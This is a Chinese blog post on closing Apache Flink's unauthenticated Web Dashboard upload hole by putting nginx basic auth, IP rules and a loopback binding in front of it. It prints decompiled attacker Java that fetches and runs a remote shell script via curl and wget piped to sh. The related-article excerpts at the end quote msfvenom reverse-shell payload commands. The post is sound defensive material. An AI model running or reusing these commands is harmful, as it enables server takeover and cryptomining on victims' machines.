【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞

最新推荐文章于 2024-08-24 07:21:14 发布
最新推荐文章于 2024-08-24 07:21:14 发布
阅读量8.2k 收藏 13
点赞数 1
分类专栏: Flink SQL 实战 文章标签: 安全 安全漏洞 flink nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35815527/article/details/103992736
版权

【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞

介绍

攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗

通过反编译得到的恶意代码:

package com.example;

import java.io.IOException;

public class Main {
    public Main() {
    }

    public static void main(String[] var0) throws IOException {
        String var1 = "142.44.191.122/f.sh";
        String var2 = "curl " + var1 + "|sh";
        String[] var3 = new String[]{"/bin/bash", "-c", var2};
        Runtime.getRuntime().exec(var3);
        String var4 = "wget -q -O - " + var1 + "|sh";
        String[] var5 = new String[]{"/bin/bash", "-c", var4};
        Runtime.getRuntime().exec(var5);
    }
}

思路:Nignx使用HTTP基本身份验证限制访问

介绍

您可以通过实现用户名/密码身份验证来限制对网站或网站某些部分的访问。用户名和密码取自由密码文件创建工具创建并填充的文件,例如apache2-utils

HTTP基本身份验证也可以与其他访问限制方法结合使用,例如通过IP地址地理位置限制访问。

先决条件

  • NGINX
  • 密码文件创建实用程序,例如apache2-utils(Debian,Ubuntu)或httpd-tools(RHEL / CentOS / Oracle Linux)。 htpasswd是Apache的Web服务器内置工具,用于创建和更新储存用户名、域和用户基本认证的密码文件 。

创建密码文件

要创建用户名-密码对,请使用密码文件创建实用程序,例如,apache2-utilshttpd-tools

  1. 确认已安装apache2-utils(Debian,Ubuntu)或httpd-tools(RHEL / CentOS / Oracle Linux)。

  2. 创建密码文件和第一个用户。运行htpasswd带有-c标志的实用程序(以创建一个新文件),文件路径名作为第一个参数,用户名作为第二个参数:

    [root@Young conf.d]# htpasswd -c /etc/nginx/conf.d/.htpasswd RobinWang
New password: 
Re-type new password: 
Adding password for user RobinWang

    按Enter,然后在提示时键入RobinWang的密码。

  3. 创建其他用户密码对。省略-c标志,因为文件已经存在:

    $ sudo htpasswd /etc/nginx/conf.d/.htpasswd user2

  4. 您可以确认该文件包含成对的用户名和加密的密码:

    [root@Young conf.d]# cat /etc/nginx/conf.d/.htpasswd 
RobinWang:********/********.********.********
user2:********/********.********.********

配置NGINX和NGINX Plus以进行HTTP基本身份验证

  1. 在要保护的位置内,指定auth_basic指令并为密码保护的区域命名。询问凭据时,该区域的名称将显示在用户名/密码对话框窗口中:

    location  / api  { 
    auth_basic  “管理员 区域” ; 
    #... 
}

  2. auth_basic_user_file使用包含用户/密码对的*.htpasswd*文件的路径指定指令:

    location  / api  { 
    auth_basic            “管理员 区域” ; 
    auth_basic_user_file  /etc/apache2/.htpasswd ;  
}

另外,您可以使用基本身份验证来限制对整个网站的访问,但仍将某些网站区域设为公开。在这种情况下,请指定指令的off参数,该auth_basic指令取消从较高配置级别的继承:

server {
    ...
    auth_basic           "Administrator’s Area";
    auth_basic_user_file conf/htpasswd;

    location /public/ {
        auth_basic off;
    }
}

将基本身份验证与IP地址的访问限制相结合

HTTP基本身份验证可以有效地结合IP地址的访问限制。您可以至少实现两种方案:

  • 用户必须经过身份验证并具有有效的IP地址
  • 用户必须经过身份验证或具有有效的IP地址

  1. 使用allowdeny指令允许或拒绝来自特定IP地址的访问:

    location /api {
    #...
    deny  192.168.1.2;
    allow 192.168.1.1/24;
    allow 127.0.0.1;
    deny  all;
}

    仅对192.168.1.1/24网络(192.168.1.2地址除外)授予访问权限。请注意,allowdeny指令将按其定义的顺序应用。

  2. 将IP和HTTP身份验证的限制与satisfy指令结合使用。如果将指令设置为all,如果客户端同时满足两个条件,则将授予访问权限。如果将指令设置为any,如果客户端满足至少一个条件,则将授予访问权限:

这里我没有公网地址客户端就不用了

Nginx反向代理

首先修改Flink的Web前端配置

rest.port: 8084

# The address to which the REST client will connect to
#
rest.address: 127.0.0.1

将Flink的Web前端设置为 回送地址 的端口

然后使用反向代理这个地址

			proxy_set_header Host $host;
    		proxy_set_header X-Real-IP $remote_addr;
    		proxy_pass http://127.0.0.1:8084;

完整的例子

该示例显示了如何通过简单身份验证以及IP地址访问限制来保护您的状态区域:

    server {
        listen 0.0.0.0:8081;
        #root   /usr/share/nginx/html;

        location / {
			proxy_set_header Host $host;
    		proxy_set_header X-Real-IP $remote_addr;
    		proxy_pass http://127.0.0.1:8084;
            auth_basic           "Apache Flink Dashboard :)";
            auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
        }
    }

配置好了之后记得Reload一下

# nginx -s reload

当您访问状态页面时,系统会提示您登录:

在这里插入图片描述

如果提供的名称和密码与密码文件不匹配,则会出现错误。401 (Authorization Required)

在这里插入图片描述

_RobinWang
关注
专栏目录
Apache-Flink授权访问高危漏洞修复
weixin_38255219的博客
07-12 1868
由于flink没有鉴权的设置,使用使用 htpasswd 工具+服务器系统防火墙设置,才能禁用默认对外访问的8081端口,使用用户名+密码实现安全验证登录flink web ui。
[漏洞复现]Apache Flink授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 2747
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
Day98:云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
最新发布
m0_74402888的博客
08-24 2303
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接授权访问获取secrets和token利用。
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 5193
Apache Flink漏洞复现(授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Apache Flink 授权访问+远程代码执行
Birdman-one的博客
12-11 2303
Apache Flink 授权访问+远程代码执行 作者:Birdman-one 前言 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞,影响范围:<= 1.9.1(最新版本) 此次复现就是通过版本Version: 1.10.1进行复现利用。 FOFA FOFA 语句 app="Apache-Flink" && country="CN" app="Apache-Flink" && country="CN" &&am
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 2010
Apache Flink 授权远程代码执行检查
2020-10-24Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 1113
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。 Apache Flink授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
攻击授权访问Flink 集群
3569
08-19 769
Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的授权问题。 Flink Web UI 在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
Apache Flink 授权访问+远程代码执行.pdf
04-30
### Apache Flink 授权访问远程代码执行漏洞解析及防范 #### 一、漏洞概述 **Apache Flink**是一款高性能、分布式、流处理引擎,它支持事件驱动的数据流处理和批处理作业。由于其出色的性能表现,在大数据处理...
Apache Flink 授权远程代码执行提权(实战)
失心少年
12-04 1306
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 721
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。Apache Flink授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
gitee 上传jar包_【Apache Flink漏洞复现】授权访问&上传jar包getshell
weixin_29820757的博客
01-18 582
漏洞介绍Apache Flink Dashboard默认没有用户权限认证攻击者可以通过授权Flink Dashboard控制台直接上传木马jar包可远程执行任意系统命令获取服务器权限二影响范围Apache Flink <= 1.9.1三漏洞检测正文fofa搜索:app="Apache Flink"默认端口为8081poc.pyimport sysimport jsonimpo...
flinkdashboard授权
someInNeed的博客
10-16 1549
访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginxflinkwebui 增加账号密码。添加配置完成以后,重启nginx,修改flink.conf。配置nginx.conf。
Apache Flink CVE-2020-17519/17518 漏洞复现
蚁景网安学院
01-18 794
喜欢就关注我吧,订阅更多最新消息文章字数1507 预计阅读时长7分钟 涉及知识点实操练习-网络安全事件https://www.hetianlab.com/cour.do?w=1&am...
getshell之Apache Flink 授权访问+远程代码执行
MoCoCN的博客
11-12 878
@[MoCo](getshell之Apache Flink 授权访问+远程代码执行) 0x00前言 又是领导不在的一天,今天兄弟们就是天,随着工作的时间越来越久对知识的渴望也越来越强大,最近几天在看反弹shell的一些文章,也学习到了一些反弹shell技巧和姿势,由于环境的问题,暂不能记录文本,虽说都是一些基本的吧,慢慢来嘛,看着文章,吐槽的国内某知名的培训机构,努力的汲取知识,看着看着就累了,有点看不动了,但是还是想学,于是决定去看看adminxe大佬的博客上看看有没有发布新的文章,看见大佬昨天发布了一
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2690
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值